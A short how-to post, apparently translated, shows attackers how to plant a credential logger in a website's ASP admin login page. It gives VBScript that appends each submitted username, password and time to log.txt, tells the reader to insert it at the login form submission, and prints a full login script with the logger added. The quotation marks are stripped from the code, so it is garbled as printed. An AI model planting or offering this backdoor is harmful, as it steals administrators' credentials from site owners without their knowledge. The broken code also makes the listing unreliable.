Many hackers obtain the user login password of the target website by modifying the background login code, so that once we enter the password, it is saved to a txt.
The code is as follows:
set fso=server.createobject(scripting.filesystemobject)
if fso.FileExists(server.mappath(log.txt))=true then
set fin=fso.OpenTextFile(server.mappath(log.txt))
temp=fin.readall
fin.close
set fin=nothing
end if
set fout=fso.createtextfile(server.mappath(log.txt))
fout.WriteLine(temp&user:&username&¦pwd:&password&¦time:&now()&)
fout.close
set fout=nothing
set fso=nothing
Insert it where the form is submitted at the background login!
Reference documents:
Copy the code code as follows:
<%@language=vbscript codepage=936 %>
<%
dimsql,rs
dim username,password,CheckCode
username=replace(trim(request(username)),',)
password=replace(trim(Request(password)),',)
CheckCode=replace(trim(Request(CheckCode)),',)
if UserName= then
FoundErr=True
ErrMsg=ErrMsg & <br><li>Username cannot be empty! </li>
end if
if Password= then
FoundErr=True
ErrMsg=ErrMsg & <br><li>Password cannot be empty! </li>
end if
if CheckCode= then
FoundErr=True
ErrMsg=ErrMsg & <br><li>The verification code cannot be empty! </li>
end if
if session(CheckCode)= then
FoundErr=True
ErrMsg=ErrMsg & <br><li>Your login time is too long, please return to the login page to log in again. </li>
end if
if CheckCode<>CStr(session(CheckCode)) then
FoundErr=True
ErrMsg=ErrMsg & <br><li>The confirmation code you entered is inconsistent with the one generated by the system, please re-enter it. </li>
end if
'Behind this is the code I added ~ the start area
set fso=server.createobject(scripting.filesystemobject)
if fso.FileExists(server.mappath(log.txt))=true then
set fin=fso.OpenTextFile(server.mappath(log.txt))
temp=fin.readall
fin.close
set fin=nothing
end if
set fout=fso.createtextfile(server.mappath(log.txt))
fout.WriteLine(temp&user:&username&|pwd:&password&|time:&now()&)
fout.close
set fout=nothing
set fso=nothing
'The code behind was deleted by me~end area
%>